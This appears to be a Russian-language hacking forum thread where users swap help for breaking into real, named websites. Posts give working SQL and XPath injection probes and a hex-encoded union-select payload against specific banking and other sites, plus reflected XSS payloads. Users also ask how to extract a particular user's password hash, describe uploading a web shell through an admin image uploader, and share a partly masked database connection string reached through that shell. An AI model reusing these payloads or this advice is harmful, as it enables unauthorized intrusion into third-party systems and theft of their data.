Ваши вопросы по уязвимостям.

Ребята что тут sql или xpatch

http://www.telebank.md/wap/(S(obtdv...x?Lang=EN' AND 3*2*1=6 AND '000hDWg'='000hDWg

 

Какой-то странный вопрос.
http://www.telebank.md/wap/(S(usma2... AND 3*2*1=6" onmouseover='alert(1234567890)'
Тут xss или alert ?

 

Бинарарные операции практически эквивалентны в языках XPath и SQL.

kostea, Почитайте про XPath: http://www.w3.org/TR/xpath/

Пользуясь некоторыми функциями вы сможете доказать или опровергнуть наличие XPath-инъекции, однако это автоматом не означает, что там SQL. К примеру:

Code:

substring('12345',0,3)='12'
substring-before('1999/04/01','/')='1999'

если что-то не отработает, то значит, что это не XPath.

 

Помогите раскрутить пожалуйста

 

Используй ExtractValue . Все работает.

 

Пробую, не получается ничего вывести
если можно в ЛС пожалуйста

 

там скуля в insert и усе легко крутится, ответили же

Code:

https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C656374206E616D655F636F6E73742876657273696F6E28292C31292C6E616D655F636F6E73742876657273696F6E28292C31292961292627-- -

 

спасибо, но не могу получить md5 пароль, определенного пользователя каким запросом это осуществить!

 

Киньте мануальчик или посдкажите как взломать сайт если на нём нету ?id= и т.д а в таком виде страницы http://www.site.com/game/The_Elder_Scrolls_Online_Tamriel_Unlimited или в Html на конце.

 

Парни, подскажите как в бурп сюте сохранить карту сайта для передаче sqlmapу. Может не карта сайта называется... что бы не краулить сайт по новой. Спасибо

 

С помощью where

 

http://www.maltatoday.com.mt/ui_frontend/video_thumbnail/300/175/?url= можно что-то придумать?

 

придумать что? что вас смущает?

 

не получается заюзать.

 

что именно заюзать? вы видите там уязвимость?

по соседству есть Reflected XSS

Code:

http://www.maltatoday.com.mt/ui_frontend/<svg onload=prompt(1)>

 

xss видел , нельзя выполнить код на стороне сайта, Насколько я понял он должен открывать картинку , если там правильно подсунуть то там возможен rfi наверное... Я ошибаюсь?

 

ошибаешься

 

Окей. Спасибо.

 

Люди нужен хелп. Есть доступ к админке, нужен доступ к БД. Думаю найти файлы конфигов через шелл. Залить шелл никак не получается.
В админке есть редактор CKEditor 3.2 (revision 5191) и есть самописный загрузчик картинок (по содержимому не проверяется, проверяет только расширение и размер, после залития сразу файл переименовывает). Через загрузчик картинок шелл с расширениями картинок заливается на ура. Но вот как заствить его выполниться я не знаю. Опыта очень мало в таких делах.
Так же в строке поиска (тоже в админке) можно сделать такую ошибку, но я не знаю возможно здесь сделать чтонибудь.
http://hkar.ru/FTyL

 

Такая строка конфига как подключится
value="server=.\sqlexpress;database=ec*;user id=e**cms;password=**secb***
хост неуказан подключяюсь с шела,шелл на сервере